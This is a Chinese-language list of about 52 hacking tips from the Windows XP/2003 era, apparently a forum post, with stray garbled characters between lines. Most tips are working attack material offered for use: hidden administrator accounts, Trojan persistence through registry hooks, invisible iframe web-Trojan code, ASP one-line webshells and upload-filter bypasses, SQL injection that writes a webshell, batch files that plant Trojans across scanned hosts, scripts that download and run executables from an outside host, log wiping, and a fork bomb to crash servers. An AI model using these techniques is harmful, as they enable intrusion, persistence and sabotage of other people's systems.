1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
; E$ m m0 S( ncacls C:\windows\system32 /G hqw20:R9 Q. Q" W! B8 L+ t
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# E. p- `! p! @6 M3 u: C: T N
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F$ a- [5 I4 F0 y: ]0 {* W2 q
( \' Q) N$ z# k& R2 V2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ W3 w# L* \: U& L1 a6 u% ^/ o3 z% k- m5 D2 d$ ]- D1 o$ ^% e
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 E& T, P; u4 m
: ~* y2 Q) A6 b4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 E) G% l2 j J
3 ^0 h0 i4 c; i5、利用INF文件来修改注册表. j7 ^! A- J" C
[Version]) _) i1 O% @3 E% i t7 A
Signature="$CHICAGO$"2 B& j5 Z, A* k; a2 j- r
[Defaultinstall]0 J/ x5 }# g8 B) U
addREG=Ating/ s, v8 M- R$ L; n' V5 r1 B9 w
[Ating]& ?/ ]# _$ N& m, ?; c) |+ Y Y
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"' `: z# w' K1 p" {' q% O! ^4 ~
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' ~7 o* H" s5 ]8 C: x: G( q0 J/ C; H
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( X! J. ^: Z# P( \其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 z% |1 i {1 t/ MHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 o8 u5 A: w9 Q/ ^HKEY_CURRENT_CONFIG 简写为 HKCC1 \$ U, X4 G, I' y: u, ~
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值4 ]0 ~1 r4 a* E9 @1 F n
"1"这里代表是写入或删除注册表键值中的具体数据
6 B' B& g$ f+ D& s$ \# t7 v
$ z0 t& O2 B- A6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
$ c C# \9 y1 i* A多了一步就是在防火墙里添加个端口,然后导出其键值% u2 F3 ^5 g; {3 ?0 T: |
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! U3 _. t6 c) G! t
3 ?5 T5 O( Q6 a6 t
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
: b# f, ~# y# N- }" ]在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" _8 R' L# q5 }3 W; p) @8 }6 o5 Y! h* | [7 c
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# y( p5 s* Y* F! n' M
' l# Y! n3 F2 u, [) V. J9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
( \7 \, ?* g1 T/ E) r. [可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。/ P. b U6 z; h5 {( O9 w7 j
4 M' |- Q, s- u7 ]9 G10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
/ e. T1 O! q6 K }" g. k* W# ?
Y, D. ~ U" b t0 T ^11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
/ B" s" o' ^6 Q0 Y& a用法:xsniff –pass –hide –log pass.txt" l- i: E5 t8 s. T. f+ T
4 _, b& D8 Y2 a( [12、google搜索的艺术
: i% x4 n2 |) b. s搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”+ Q! z) s. y% t- [, D g! s
或“字符串的语法错误”可以找到很多sql注入漏洞。
& v- R( j; [ X
: `0 S5 N# E: L! ]3 G13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 V0 W0 {4 y* O- [5 t
" X7 C. ]) N- \! o' M# R14、cmd中输入 nc –vv –l –p 1987
& z6 U( w7 h; ^* B w* c# R做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
' h$ i$ F: ~5 |. u$ C2 n
9 t$ r9 y" ]6 @5 {# G' p" Y# M15、制作T++木马,先写个ating.hta文件,内容为 }* j4 X! x( `8 o& y/ @; R ^
<script language="VBScript">
( b+ u/ l6 b; w% \% ~3 R+ U+ Jset wshshell=createobject ("wscript.shell" )
, w v) m/ [$ o9 y$ B1 V6 Z5 A; ~) w& Qa=wshshell.run("你马的名称",1)
0 q+ y8 L. c( C0 twindow.close! h! P3 x8 ^2 y! q+ Z
</script>- u7 S' \/ T; C; S
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. }" z- C6 ~! w' K/ ^& w1 H: c- X! Z5 V% b0 n! u3 I
16、搜索栏里输入: {, @# m% V( U8 x: A
关键字%'and 1=1 and '%'='2 j% y- x j7 G( }$ p6 w
关键字%'and 1=2 and '%'='
' V$ R+ W# T. g9 m9 R& U0 c! w比较不同处 可以作为注入的特征字符
& Y) R% ]' Z2 C; ^/ m2 O* d/ _, z8 Y
17、挂马代码<html>) d4 J! J. ?. A" R6 V
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>: P# q# F5 @, G: ~2 T
</html>
( t' i/ U9 q% Z) N; J" F: F0 F
+ o% p3 |- |, B$ a: H' D18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# }5 }& n5 C" V6 g% J- C
net localgroup administrators还是可以看出Guest是管理员来。
7 n& l7 S" ?5 `, y* c% n% X& [0 v0 R
- r( e9 O' T7 V; t19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: ^0 x7 v8 ^2 l# n用法: 安装: instsrv.exe 服务名称 路径* U# W( w' x2 K4 M' A/ t
卸载: instsrv.exe 服务名称 REMOVE
. W8 g, a& T& i1 N3 ?& p& D) b1 q1 ^( {+ G; a
* @. h9 R+ `3 ~! j
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
9 }: S" G7 m; O不能注入时要第一时间想到%5c暴库。
: Q! u! }2 F& U6 w S" d* N% A* M& l) o H! f
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( x' K; K4 W8 ^' x# k% p
% N# ~6 C" `+ h23、缺少xp_cmdshell时) f- f: S( A: \% t/ y8 [# M1 P
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; B0 W. t* h. A& A d! j4 l! ?假如恢复不成功,可以尝试直接加用户(针对开3389的). c1 M5 l& q3 |$ u% E
declare @o int
7 m3 y5 X* j$ t- Cexec sp_oacreate 'wscript.shell',@o out2 C j* t# q( p6 Q" O
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员# }9 r/ l+ S% @# |! y
* B' s% A5 V! B/ ^: p8 k
24.批量种植木马.bat
" G' X3 M: A# v, Tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 H4 [7 @, t6 a" S8 j/ G; ^for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; }1 K" s! J9 |3 j+ y* y扫描地址.txt里每个主机名一行 用\\开头
! r2 e# J* M2 \ V$ G0 s0 T0 }7 J: E
( y! k8 i0 u0 l5 W, t. g3 Q25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) ~ S0 ~; U7 N- u2 U. D. ?. U
5 Y, W7 P4 p2 o2 ?. V# ^7 ]26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.5 f" M7 `+ d9 l1 X
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.) q* n$ T8 m4 Y8 ~7 N m) A" l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 J+ T5 i9 `: J& X
, z. a7 J4 w+ c8 \% q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP" N1 P8 x: l" B6 x+ h
然后用#clear logg和#clear line vty *删除日志
; ~" l; m& M P( C% S0 o- N$ z8 I5 T, c) `) `; h1 f' J
28、电脑坏了省去重新安装系统的方法
* ]& l3 g2 v, J, l$ D/ G! i5 W纯dos下执行,1 }2 X& M h" a8 x; R* A4 N+ }
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config& O K( N6 `6 `
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config6 P; w, r. Q6 X7 e: g6 \% D8 S
9 e: U7 t, n) r3 {' f a29、解决TCP/IP筛选 在注册表里有三处,分别是:( d5 C7 R: S. ?8 n1 L4 O3 Y5 f* d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 W" }* N Q3 U: `6 {# X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" @6 [) s W: i- F! Z8 J
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, B- p d8 B: @+ L; a
分别用$ _, P7 d) m7 ?
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 s; C7 @- l% ^, A: }
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 O0 R" m$ N, J; H' f. \
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
M/ E: j f7 ?命令来导出注册表项
% N. y8 \$ ]% q- f/ ~; N然后把三个文件里的EnableSecurityFilters"=dword:00000001,$ \& B5 h% q( b* U' n1 S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用6 V( M/ d, y: o4 i* I
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。0 [ l7 I9 D; j) L q
6 q0 q4 C {4 B( x6 k
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
- j2 N/ c l1 O( s# |0 P0 Z/ v1 j" NSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
# Q" P* G( Z# |9 A* _! o3 |$ I* q3 C% h7 L' B) n
31、全手工打造开3389工具
- w* T5 \6 u; q* m9 x$ B# ?打开记事本,编辑内容如下:
5 {1 M' h. N* d; |echo [Components] > c:\sql" u* \- R- y! q" }. K
echo TSEnable = on >> c:\sql
1 I# y4 i+ |( E# B! Y1 o6 lsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q* y# U$ h0 e s
编辑好后存为BAT文件,上传至肉鸡,执行
5 x% k6 y% Z/ x$ s6 J \) r+ i. Y7 C: h2 k) u6 F/ l9 X
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马/ k! @0 [7 j8 Z) ?' Z1 P$ c
" Q, }# B- z3 X& b8 C' X. `33、让服务器重启7 I' n0 C% i) o
写个bat死循环:1 u1 S) s j- T: O4 I
@echo off
: m. ~! X1 `9 S% |# b8 R" ?! ?:loop1
) } u/ ^ @) x/ tcls
* \7 Z4 y8 `6 t& D6 Pstart cmd.exe
9 h8 O, V* {2 E/ S5 e0 l mgoto loop1
; G; ^( e; l# _保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
* }( R6 h0 z( T! `, f' t& L/ U
0 |4 p9 E k. \$ ?5 H1 P34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% s+ `, d8 Q7 Q% f- F8 s7 p+ D d@echo off
+ B0 W( {* @& n M9 Idate /t >c:/3389.txt2 k$ s9 j1 C, n3 W0 O3 |) T
time /t >>c:/3389.txt
7 _0 X3 g: \' }attrib +s +h c:/3389.bat) u/ i( h8 U. D
attrib +s +h c:/3389.txt0 R2 C& E9 {9 ~. T8 ?
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt2 e6 l' c4 K7 A
并保存为3389.bat4 e- U! Y' k8 H4 h1 G1 e# K
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号! A( Y0 ]# x: K& x) v4 _ U) J& C
# x2 y# U& D, i3 m+ y. `- V0 i
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 ~2 e2 }$ M' gstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
. i0 S( k* A* W3 V输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
5 M& X* p# b8 h' W6 n9 }% P( o# ~/ V7 j* l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: K6 D* [ Y. G @2 f& {" {3 wecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 \7 ~5 c# W4 W5 R* f' decho 你的FTP账号 >>c:\1.bat //输入账号
2 h' b9 q d+ {$ p9 G" k; C/ Q2 | }echo 你的FTP密码 >>c:\1.bat //输入密码
' D; R! w6 C! v. s9 |+ C$ kecho bin >>c:\1.bat //登入0 r/ q: I0 c6 O; _ e# K
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么8 Q. f3 h% A; ]. d" K
echo bye >>c:\1.bat //退出
1 R7 Q( V3 C p& T4 v* e; z然后执行ftp -s:c:\1.bat即可+ B, \3 G( \5 v
6 t' m, @) p! N+ s
37、修改注册表开3389两法8 x$ u$ }( x+ g, b' N' p
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表& \) L: J1 \6 b; H# E, u
echo Windows Registry Editor Version 5.00 >>3389.reg( @1 v# J8 t& s- M- U5 C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg/ q% s' `: g1 g* `! E5 Z2 k
echo "Enabled"="0" >>3389.reg
% s5 K) I3 S- p& v6 I, ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
6 D- ?* y+ c; c2 b$ D4 WNT\CurrentVersion\Winlogon] >>3389.reg, Y; `2 [& a% @+ ~
echo "ShutdownWithoutLogon"="0" >>3389.reg
4 ?5 Y( |, w. c+ _) pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]2 i- t' w3 x* G* `0 g
>>3389.reg" r4 b; a0 [+ u: r; e, v0 I
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 U9 W) `/ X9 B. c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
- a3 {5 I: x! R>>3389.reg
3 s0 ]& A1 I5 R! v# Pecho "TSEnabled"=dword:00000001 >>3389.reg
. @( v$ k! |( r7 P$ k3 O* v) uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' `& Q: P9 c$ D: J/ w: H. r( Z
echo "Start"=dword:00000002 >>3389.reg
8 ~+ R8 i/ h. W# P8 \: S& vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]' k3 M3 `, {& T" S
>>3389.reg" q9 }( {& |- U$ {. V
echo "Start"=dword:00000002 >>3389.reg
' ]7 ]3 X/ {; C; }. c+ t) techo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ o' Q4 N5 M: @6 }( Lecho "Hotkey"="1" >>3389.reg- a$ q+ q+ R& C1 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 C0 ~. N7 \1 _
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
% c7 P7 q# [ y, g- S6 Jecho "PortNumber"=dword:00000D3D >>3389.reg; I+ w0 D- s4 @! D0 ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" t1 D6 C" ?( a/ y& W6 n" G! t1 b, KServer\WinStations\RDP-Tcp] >>3389.reg
8 L& [# F0 y, eecho "PortNumber"=dword:00000D3D >>3389.reg3 B& q* ]9 O# W# P* b) S7 v" M$ E
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
! V) @) a( @+ {( ~" U5 d! D6 S(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ `! {9 r" O+ s6 @# ]. v5 I
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效. E& o' N" N7 n' ]- n/ R4 r8 o
(2)winxp和win2003终端开启 E0 ]$ r, \1 ]1 R; T% J
用以下ECHO代码写一个REG文件:
" U% T" J8 l" P7 xecho Windows Registry Editor Version 5.00>>3389.reg
) x, q: v+ d) J/ M/ \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 V1 G" y$ s3 {! Q }
Server]>>3389.reg
8 |2 f& A5 b2 o" u' X0 _8 xecho "fDenyTSConnections"=dword:00000000>>3389.reg
( L" ~7 ?# _, ?! ~& ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal P( A; o/ _) |2 \& J$ v
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
q- Q3 N( G; l% P. i! S) kecho "PortNumber"=dword:00000d3d>>3389.reg# Q) u* d" W& J/ N7 ]1 q7 r& w( }! O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# j' b( u v( F2 a8 a) @ aServer\WinStations\RDP-Tcp]>>3389.reg9 n% z1 L. W# _- S) a# v, h+ [" Q
echo "PortNumber"=dword:00000d3d>>3389.reg
% j3 m, B" G; D% Z! `1 W然后regedit /s 3389.reg del 3389.reg
" `/ \, i/ F* X* b1 w& UXP下不论开终端还是改终端端口都不需重启1 i8 d2 t" I; w0 y+ x
& B7 C. Q) _8 l; L( f9 x
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
& h! c9 E3 k I4 }用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'6 v) J: w0 L/ S- J. d. f2 |
; @* n3 `* t1 Q: D% |: y- J' U$ y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 d- z0 a; O' D% ^# C(1)数据库文件名应复杂并要有特殊字符
+ o9 P3 s/ T( F) A* I' X6 s(2)不要把数据库名称写在conn.asp里,要用ODBC数据源- G9 _& y5 e, v1 Y% x0 n
将conn.asp文档中的6 P+ Y9 ^) p* }
DBPath = Server.MapPath("数据库.mdb")+ h h( H7 t( I4 {
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath4 }4 \5 m8 \- k& ^" ]" H
, u7 H! z% s) m
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置/ `3 h5 y8 O8 B
(3)不放在WEB目录里; b3 }' H! W) U6 X$ w; p/ E
2 b, w; W+ r; j40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉& \! w* ^& n* v+ H7 l
可以写两个bat文件$ q$ N" K$ r% @. O
@echo off
. h5 O& R+ ?- V' {6 @3 O@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
/ d. }) c3 S1 r5 e. F@del c:\winnt\system32\query.exe
1 O6 r* Y7 l8 h# A@del %SYSTEMROOT%\system32\dllcache\query.exe
/ P4 a8 s. B* D' v( S6 _@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! p" h1 m% ]' }& K L% P
: ^2 u9 s d9 W: Q4 ]
@echo off3 ^2 u, i# z. h1 x
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
+ K1 F s& P) K; L' m@del c:\winnt\system32\tsadmin.exe
1 V6 C& W/ r; o! t% w2 k* o@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! h8 ~2 [5 |: o" y6 B
" Q3 }5 X7 h u& T" E
41、映射对方盘符, B: `- U6 r- z2 ]+ g+ }
telnet到他的机器上,
* R1 N& l3 k, ^net share 查看有没有默认共享 如果没有,那么就接着运行8 g5 X3 J9 V. _ b. G( {1 y
net share c$=c:
2 r9 A/ |" b9 ~net share现在有c$
9 b1 }1 j8 H. F& L' M7 c: D在自己的机器上运行
0 S) `0 z+ R* \: w9 j' Cnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K7 w2 A; F0 R- r1 c
2 Y. K: |* u0 z5 o2 f( ]1 s42、一些很有用的老知识 f# w4 ~2 e6 y1 t8 T7 v5 Z
type c:\boot.ini ( 查看系统版本 )0 B8 |1 E3 s+ A7 d3 }
net start (查看已经启动的服务)+ z. M C+ s1 e6 [7 \& h
query user ( 查看当前终端连接 )
& W, Q8 x/ ]# c" B3 s: V0 Jnet user ( 查看当前用户 )/ i- q( E ^7 M; t+ y$ t9 T3 O
net user 用户 密码/add ( 建立账号 )
" g# @3 H* q9 l! Jnet localgroup administrators 用户 /add (提升某用户为管理员)
3 Q+ V9 L( E8 o) A) bipconfig -all ( 查看IP什么的 )
% H. R) \3 ?* b$ V0 Wnetstat -an ( 查看当前网络状态 )( V5 ]) M' V, N& T6 z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 b$ V$ e, @ _$ M克隆时Administrator对应1F4
7 N# r0 Q0 A/ c! ]5 Z1 e, U+ uguest对应1F57 G- F. T9 b2 S: D) g" S1 v
tsinternetuser对应3E8
; R' Q5 `: H/ O: \' [& i6 Z4 D9 ^1 L( U' e
43、如果对方没开3389,但是装了Remote Administrator Service+ C5 ~. q. u9 M
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 e0 ^% s; {* Y" \, a8 A解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" f% x7 [2 z o( e3 G/ f
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 L# c9 @8 `' l. m5 @9 V7 [
( ` p4 j, b+ L; l/ i
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 ^8 f$ T4 A' b8 Q$ \* G; I$ ]3 w& A本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ T5 L: g! I, I0 I c) a$ k
' n7 `, w/ w, T4 Q8 O6 e$ r8 }4 d' t45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), u# u1 ^. y: P
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
2 q# i% ]* {6 C- m5 L; q^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =# }. b; u+ A8 {, K1 l7 b5 p/ w
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% C5 y( |, a s0 A0 C3 \1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs; J+ ?/ w3 ~, ?2 G; f% t
(这是完整的一句话,其中没有换行符). ^% M; M1 I: f; o
然后下载:
$ T9 s, a \+ T# Scscript down.vbs http://www.hack520.org/hack.exe hack.exe: _' [& P+ E3 w6 w0 G- w4 D! {
, Z5 T2 M: _% D
46、一句话木马成功依赖于两个条件:' |# s, w* d& Q' Y
1、服务端没有禁止adodb.Stream或FSO组件 q/ @( I4 l7 n0 X
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 z* X- S1 E) W' l0 \% a- P, C) |& v
8 l3 @2 V: @! Y: @! K
47、利用DB_OWNER权限进行手工备份一句话木马的代码:: s( Z J1 \2 D
;alter database utsz set RECOVERY FULL--
/ s. X! ^! v, Q; | |;create table cmd (a image)--% F, q6 j/ e# s6 ]+ M* H5 w* \1 o
;backup log utsz to disk = 'D:\cmd' with init--' d: o" c. Q2 s% R* }& Q9 Q" e$ v W
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. q, l& K, U4 {;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--9 h/ ?8 D# m# R8 i$ x: K0 G8 T3 Q6 w! b
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
6 v+ Q, r$ J8 u2 \. c; t, I( J: D+ _& O. |1 C* J* s! {& a8 x0 d" V
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
- U! N+ i# S( p
- ]$ G# ]& m% u2 l7 x! S用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
5 {& K; U8 |) G2 t3 c- ^所有会话用 'all'。
+ X5 n) r2 U5 W" X* f-s sessionid 列出会话的信息。
2 c) T4 r$ |3 v1 y) N t-k sessionid 终止会话。
& R' r, z5 J/ z, _-m sessionid 发送消息到会话。
0 }& g" u* W8 G8 |% l; Y N/ S; P" {3 ]& g
config 配置 telnet 服务器参数。" f0 j# A; b1 m
) M& ?6 l! y# i! Z
common_options 为:
+ @) V5 F: s$ T' s* _-u user 指定要使用其凭据的用户 w0 [0 S# h0 L' U1 k* l+ u0 o* x
-p password 用户密码6 O* [+ j9 B1 f% Z: ?
, U9 k+ c6 i9 _7 a
config_options 为:# u, z6 S4 {' C2 [2 V0 G# L
dom = domain 设定用户的默认域
6 {1 l1 t4 s. P# ?ctrlakeymap = yes|no 设定 ALT 键的映射8 D2 }5 @6 S! u& o5 ]2 Z* K: s- g
timeout = hh:mm:ss 设定空闲会话超时值
% ^& g- P0 B& m% Vtimeoutactive = yes|no 启用空闲会话。
& e" {4 S3 M, V5 u N1 jmaxfail = attempts 设定断开前失败的登录企图数。/ }( ~% |; i7 O) H1 J
maxconn = connections 设定最大连接数。8 c: t X5 V; H3 G: D+ h
port = number 设定 telnet 端口。
( t$ X) D9 s, y- O% v& ^! [sec = [+/-]NTLM [+/-]passwd. o6 \: N, P. k! V' C
设定身份验证机构
4 s4 Q7 t/ U2 v" D7 wfname = file 指定审计文件名。' @# \' n; \: n2 P& {$ d
fsize = size 指定审计文件的最大尺寸(MB)。
9 `7 p3 R7 ^9 R0 b! z8 Dmode = console|stream 指定操作模式。/ }6 {$ W! @3 B3 T2 _5 I- T7 C
auditlocation = eventlog|file|both8 m4 N; C8 R, t
指定记录地点0 {! [: z' o0 w9 A
audit = [+/-]user [+/-]fail [+/-]admin/ }0 y% Q( I9 u# S3 g* Q
' ]) q. ? T5 I: X49、例如:在IE上访问:! R4 ^! ]8 b, [8 e" g5 h
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/- T( O" J- b# r# u/ V' f
hack.txt里面的代码是:
. E6 s& s B: Z6 @<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
" R( |3 ~2 h7 h5 C$ Y把这个hack.txt发到你空间就可以了!/ R: ]7 v& r4 T5 g( q& E: H0 b' ]' L
这个可以利用来做网马哦!
2 e x4 d) P9 e, |$ L# U9 q8 F1 k) `* X T. K
50、autorun的病毒可以通过手动限制! R6 K# P% }3 K: |* s
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& g! n' }* e- {( x B
2,打开盘符用右键打开!切忌双击盘符~/ Z5 o& q- r/ O0 y: d4 d2 e& Q \
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
0 j& S4 a* M# s$ p4 F. _. S5 y' P# G/ ^6 d9 ?( z8 ^% d, |
51、log备份时的一句话木马:# W* V" L% q, K; Q
a).<%%25Execute(request("go"))%%25>
) n; o- d y, ?1 E) N8 x, }6 X- }b).<%Execute(request("go"))%>! G: Z4 A8 f7 T/ L5 t3 k
c).%><%execute request("go")%><%
; {+ d+ L& B6 j) p/ @ ~d).<script language=VBScript runat=server>execute request("sb")</Script>, `- C$ b4 N1 O+ E% G0 W
e).<%25Execute(request("l"))%25>! x5 w0 B8 n: {* x9 Z' b* j
f).<%if request("cmd")<>"" then execute request("pass")%>" L3 Q9 N Y& B! P6 Y
7 R1 M. I8 C+ v+ P2 x5 x( N: w; m
52、at "12:17" /interactive cmd
9 g+ X7 B$ U0 O执行后可以用AT命令查看新加的任务
0 {* `! O8 }* b% y1 s! y* v" Z$ P用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
i# K2 m( ?$ U+ [
